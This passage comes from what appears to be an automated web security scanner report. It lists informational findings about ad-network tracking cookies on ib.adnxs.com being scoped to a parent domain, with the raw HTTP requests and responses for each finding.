Set-Cookie: acb458625=5_[r^208WMuF4Lw)IE.8*M4Bc?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8BW6sqWS4UpBWHfHSmrEELbP0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEkgQBAgUCAAIAAAAAUyJEQAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252891%29%3Buf%28%27r%27%2C+151403%2C+1296252891%29%3Bppv%2882%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2884%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2811%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2882%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2884%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2887%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28619%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28620%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28621%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 22:14:51 GMT
Content-Length: 742

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-79489099_1296252890,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.86. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly
acb266870=5_[r^208WMuF4Lw)IE.8qu]==?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPyqFBR3BpJpcBWHfHSmrEEKwRUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEsAQBAgUCAAIAAAAAHyH9zwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296254384%29%3Buf%28%27r%27%2C+151403%2C+1296254384%29%3Bppv%2882%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2884%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2811%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2882%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2884%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2887%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28619%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28620%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28621%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb437727=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb266870=5_[r^208WMuF4Lw)IE.8qu]==?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPyqFBR3BpJpcBWHfHSmrEEKwRUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEsAQBAgUCAAIAAAAAHyH9zwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296254384%29%3Buf%28%27r%27%2C+151403%2C+1296254384%29%3Bppv%2882%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2884%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2811%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2882%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2884%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2887%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28619%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28620%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28621%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 22:39:44 GMT
Content-Length: 834

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-46060337_1296254384,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.87. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly
acb781784=5_[r^208WMt+t%s!@@-#?/ty]?enc=FuY9zjRhyT96tTdTfNfGPwAAAKCZmQlAerU3U3zXxj8V5j3ONGHJP-d6bImG40osBWHfHSmrEEIVVUNNAAAAANc8AwA3AQAAZAAAAAIAAABrTwIAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAA3AUBAgUCAAUAAAAAVyHLDgAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+27%2C+1296258325%29%3Buf%28%27r%27%2C+151403%2C+1296258325%29%3Bppv%2882%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2884%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2811%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2882%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2884%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2887%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28619%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28620%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28621%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3B&cnd=!_BsQQQjUEBDrngkYwI8BILK9ASgAMczraoU2Yck_QhMIABAAGAAgASj-__________8BQgwIUhDL3AYYAiADKABCDAhUEJa5DRgFIAMoAEgBUABYqgNgAGhk&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Thu, 28-Apr-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.quadbostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-256627_1296258325%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D357355%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_h%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb780011=5_[r^208WMt+t%s!@@-#bPpSh?enc=FuY9zjRhyT96tTdTfNfGPwAAAKCZmQlAerU3U3zXxj8V5j3ONGHJP_qJUyg65S1xBWHfHSmrEEKASkNNAAAAANc8AwA3AQAAZAAAAAIAAABrTwIAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAApQQBAgUCAAUAAAAABSGv_AAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+27%2C+1296255616%29%3Buf%28%27r%27%2C+151403%2C+1296255616%29%3Bppv%2882%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2884%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2811%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2882%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2884%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2887%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28619%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28620%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28621%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3B&cnd=!_BsQQQjUEBDrngkYwI8BILK9ASgAMczraoU2Yck_QhMIABAAGAAgASj-__________8BQgwIUhDL3AYYAiADKABCDAhUEJa5DRgFIAMoAEgBUABYqgNgAGhk&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb780011=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb781784=5_[r^208WMt+t%s!@@-#?/ty]?enc=FuY9zjRhyT96tTdTfNfGPwAAAKCZmQlAerU3U3zXxj8V5j3ONGHJP-d6bImG40osBWHfHSmrEEIVVUNNAAAAANc8AwA3AQAAZAAAAAIAAABrTwIAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAA3AUBAgUCAAUAAAAAVyHLDgAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+27%2C+1296258325%29%3Buf%28%27r%27%2C+151403%2C+1296258325%29%3Bppv%2882%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2884%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2811%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2882%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2884%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2887%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28619%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28620%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28621%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3B&cnd=!_BsQQQjUEBDrngkYwI8BILK9ASgAMczraoU2Yck_QhMIABAAGAAgASj-__________8BQgwIUhDL3AYYAiADKABCDAhUEJa5DRgFIAMoAEgBUABYqgNgAGhk&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Thu, 28-Apr-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 23:45:25 GMT
Content-Length: 824

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.quadbostonherald/;net=cm;u=,cm-256627_1296258325,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de
...[SNIP]...

10.88. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:02:19 GMT; domain=.adnxs.com; HttpOnly
icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:02:19 GMT; domain=.adnxs.com; HttpOnly
acb119885=5_[r^208WMrO@Pn)IE.80Xxlp?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP-hU1RiHaOEDBWHfHSmrEELrPENNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEBAkBAgUCAAIAAAAAeiENGgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252139%29%3Buf%28%27r%27%2C+151403%2C+1296252139%29%3Bppv%2882%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2884%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2811%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2882%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2884%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2887%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28619%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28620%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28621%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:02:19 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:02:19 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:02:19 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-15223392_1296252139%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D463717%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.47846851754002273%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAW